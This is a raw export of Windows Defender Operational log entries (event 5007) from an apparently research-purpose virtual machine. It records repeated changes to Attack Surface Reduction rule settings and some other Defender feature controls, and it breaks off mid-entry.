11/14/2023 09:38:30 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=493 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x1

11/14/2023 09:38:29 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=492 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x0 New value:

11/14/2023 09:38:29 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=491 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x1

11/14/2023 09:36:00 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=490 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x0 New value:

11/14/2023 09:36:00 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=489 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x0

11/14/2023 09:35:59 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=488 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 d1e49aac-8f56-4280-b9ba-993a6d77406c e6db77e5-3df2-4cf1-b95a-636979351e5b c1db55ab-c21a-4637-bb3f-a12568109d35 3B576869-A4EC-4529-8536-B80A7769E899 56a863a9-875e-4185-98a7-b882c64b5ce5 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 5BEB7EFE-FD9A-4556-801D-275E5FFC04CC 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c 26190899-1602-49e8-8b27-eb1d0a1ce869 D4F940AB-401B-4EFC-AADC-AD5F3C50688A 75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 D3E037E1-3EB8-44C8-A917-57927947596D 92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x1 New value:

11/14/2023 09:35:59 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=487 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x0

11/14/2023 09:35:55 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=486 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x6 New value:

11/14/2023 09:35:55 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=485 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x6 New value:

11/14/2023 09:35:55 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=484 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x6 New value:

11/14/2023 09:35:55 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=483 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x6 New value:

11/14/2023 09:35:55 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=482 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x6 New value:

11/14/2023 09:35:55 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=481 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x6 New value:

11/14/2023 09:35:55 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=480 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x6 New value:

11/14/2023 09:35:55 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=479 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x6 New value:

11/14/2023 09:35:55 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=478 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x6 New value:

11/14/2023 09:35:55 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=477 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x6 New value:

11/14/2023 09:35:55 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=476 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x6 New value:

11/14/2023 09:35:55 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=475 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x6 New value:

11/14/2023 09:35:55 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=474 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x6 New value:

11/14/2023 09:35:55 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=473 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x6 New value:

11/14/2023 09:35:55 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=472 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x6 New value:

11/14/2023 09:35:55 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=471 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x6 New value:

11/14/2023 09:35:55 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=470 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 d1e49aac-8f56-4280-b9ba-993a6d77406c e6db77e5-3df2-4cf1-b95a-636979351e5b c1db55ab-c21a-4637-bb3f-a12568109d35 3B576869-A4EC-4529-8536-B80A7769E899 56a863a9-875e-4185-98a7-b882c64b5ce5 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 5BEB7EFE-FD9A-4556-801D-275E5FFC04CC 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c 26190899-1602-49e8-8b27-eb1d0a1ce869 D4F940AB-401B-4EFC-AADC-AD5F3C50688A 75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 D3E037E1-3EB8-44C8-A917-57927947596D 92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x1

11/14/2023 09:17:39 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=468 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x6

11/14/2023 09:17:39 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=467 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x6

11/14/2023 09:17:39 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=466 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x6

11/14/2023 09:17:39 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=465 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x6

11/14/2023 09:17:39 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=464 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x6

11/14/2023 09:17:39 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=463 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x6

11/14/2023 09:17:39 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=462 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x6

11/14/2023 09:17:39 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=461 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x6

11/14/2023 09:17:39 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=460 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x6

11/14/2023 09:17:39 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=459 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x6

11/14/2023 09:17:39 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=458 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x6 11/14/2023 09:17:39 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=457 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x6 11/14/2023 09:17:39 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=456 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x6 11/14/2023 09:17:39 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=455 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x6 11/14/2023 09:17:39 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=454 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x6 11/14/2023 09:17:39 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=453 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x6 11/14/2023 09:00:13 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=452 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\ServiceStartStates = 0x1 New value: Default\ServiceStartStates = 0x0 11/14/2023 08:59:18 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=451 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: Default\Signature Updates\EnableUpdateResiliency = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates\EnableUpdateResiliency = 0x0 11/14/2023 08:59:18 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=450 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\31 = 0x901 11/14/2023 08:59:18 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=449 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\22 = 0x3E 11/14/2023 08:59:18 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=448 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\_4 = 0x1 11/14/2023 08:59:18 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=447 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\10 = 0x1 11/14/2023 08:59:18 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=446 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\_9 = 0x1 11/14/2023 08:59:18 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=445 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\32 = 0x36B0 11/14/2023 08:59:18 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=444 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\_7 = 0x1 11/14/2023 08:59:18 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=443 Keywords=None 